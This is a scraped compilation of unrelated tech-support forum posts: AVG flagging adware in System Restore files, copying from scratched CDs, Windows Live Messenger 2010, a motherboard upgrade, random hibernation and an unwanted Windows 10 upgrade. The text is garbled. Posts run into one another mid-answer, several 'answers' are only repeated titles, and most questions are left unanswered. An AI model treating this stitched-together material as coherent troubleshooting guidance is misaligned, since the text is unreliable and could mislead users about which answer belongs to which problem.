Hi,
I have Spyware Terminator, AVG Free, and Malwarebytes dled. Spyware Terminator scans are clean, but when I run AVG I'm getting two results for 'Spyware'. One is "C:\System Volume Information\_restore{106CF321-99A3-4E3A-9103-1BD027606A99}\RP346\A0112493.exe";"Adware Toolbar.CJ";"Potentially dangerous object"
and the other is "C:\System Volume Information\_restore{106CF321-99A3-4E3A-9103-1BD027606A99}\RP346\A0112493.exe:\ns_00567";"Adware Toolbar.CJ";"Potentially dangerous object"

Both are Adware Toolbar.CJ
Typically I would remove these by clicking 'remove all unhealed infections'. But when I do, a warning pops up saying that forced removal could cause system instability or crash, and it gives me an option to remove anyway. Is it safe to forcably remove these infections?
And what kind of infection is that anyway? Thanks!

Answer:AVG, forced removal.

The detected _restore{GUID}\RP***\A00*****.xxx file(s) identified by your scan are in the System Volume Information Folder (SVI) which is a part of System Restore. The *** after RP represents a sequential number automatically assigned by the operating system. The ***** after A00 represents a sequential number where the original file was backed up and renamed except for its extension. To learn more about this, refer to:Restore Point ForensicsForensic Analysis of System Restore Points in Microsoft Windows XPSystem Restore is the feature that protects your computer by monitoring a core set of system and application files and by creating backups (snapshots saved as restore points) of vital system configurations and files before changes are made. These restore points can be used to "roll back" your computer to a clean working state in the event of a problem. This makes it possible to undo harmful changes to your system configurations including registry modifications made by software or malware by reverting the operating systems configuration to an earlier date. See What's Restored when using System Restore and What's Not.The SVI folder is protected by permissions that only allow the system to have access and is hidden by default on the root of every drive, partition or volume including most external drives, and some USB flash drives. I have a number of old cd's and DVD's of my mp3 music which I am trying to put onto my portable hard disk (which i asked advice on a few days ago). However some of the CD's are scratched/come up with CRC (Cycle Redundancy errors) which prevents me copying the contents from DVD drive to portable HD. I have also tried copying the info to the internal hard drive, but again no luck. What I need really is a program which forces the info to be copied onto a hard drive, but I don't have a clue if this is a) the right solution, b) what programs to use. Thanks

I'm happy and content with Windows Live Messenger 2009.I recently gave the beta for Windows Live Messenger 2010 a go... and while it's still a beta, the overall idea of it is too overwhelming for my own personal taste.Facebook integration, myspace intergration... it's just too overwhelming... it's as if they're trying to do too much with it.There's a button to simplify the interface... but it's too glitchy at this present time. Also the exclusion of custom names really annoys me; you can only use your real name. What I'm aiming to find out, is will I be forced onto this new version of messenger when the final release arises? If it does, I will be switching to aMSN.Thanks in advance.

Answer:Will I be forced onto WLM 2010?

The theory behind new versions is that they are an improvement on the previous one. Mostly they are, but I agree with you that they are not always. Anyway, to answer your question, you will not be forced to upgrade to the 2010 version.

Question: Forced to upgrade.

I got a 4870 X2 and for some reason my mobo decided to crap out on me (not sure it's my fault or not, I wasn't using an anti-static wristband but made sure I was grounded and don't think I shocked anything).

So I went ahead and ordered these:

Newegg.com - ASUS P5Q Pro LGA 775 Intel P45 ATX Intel Motherboard - Intel Motherboards

Newegg.com - Intel Core 2 Duo E8400 Wolfdale 3.0GHz 6MB L2 Cache LGA 775 65W Dual-Core Processor - Processors - Desktops

Newegg.com - ARCTIC COOLING Freezer 7 Pro 92mm CPU Cooler - CPU Fans & Heatsinks

Should be much better than my current setup. I accidentally got the 965G version of my mobo instead of the 965P version about 1 3/4 years ago when I first got my E6600. It couldn't overclock for anything, (has a hard time even reaching a 400 Mhz overclock).

I hope to hit at least 3.6 GHz Needless to say I'm pretty much broke now.

Answer:Forced to upgrade.

Bah.. we lost another one..

I've built three computers so far w/ no wrist band.. Fine so far.. Just give it a mist of static guard before and after.. or every 20 minutes..

Question: Forced Hibernation

My laptop is currently going hibernating at random after start-up and the problem is that once it does, it will consistently hibernate every minute or so again until I reboot. (Which leads to another cycle of hibernation.) I have already changed Hibernation to "Never" in power options but it still gives me this problem. I resorted to disabling hibernation completely. However, there will still be notifications popping up by my system telling me my that my system cannot go into hibernation mode because I disabled it.

It will be greatly appreciated if anyone can help me find out the root of this problem. Hibernation function is generally very useful for me especially in times of low battery and I will really like to enable this function again. I am using a LG R405A laptop (not a very new model) with Intel Pentium Dual CPU T2330 @1.60 GHz with Vista Home Premium 32-bit OS.

In my Win 7 Pro 64-bit, I just saw the following entry in Windows Logs - System:

Quote:
"Installation Ready: The following updates are downloaded and ready for installation. This computer is currently scheduled to install these updates on ‎Saturday, ‎August ‎29, ‎2015 at 5:32 PM:

No !!! Don't want to leave Win 7 !!!

So I immediately went to my Installed Updates and UNinstalled the only recent update, which was Update for Windows 7 for x64-based Systems (KB3077715), which was supposed to be only "August 2015 cumulative time zone update for Windows operating systems". Well, maybe it was, and something else triggered the Win 10 upgrade entry??

I am now past the 5:32pm upgrade time and it hasn't happened yet, but I'm scared!! What should I do to prevent the upgrade ???

Help! It's prowling around upstairs and I need help!!

PS - My PC is currently dual-booting Win 7 (which I want to save from this monster) and Win 10 (because I upgraded my 8.1 to 10), of course with different partitions on the hard drive. Is it something about the dual-booting with 10 that is infecting my 7?

Answer:Almost FORCED to update to Win 10 ??? NO!!! Help !!!
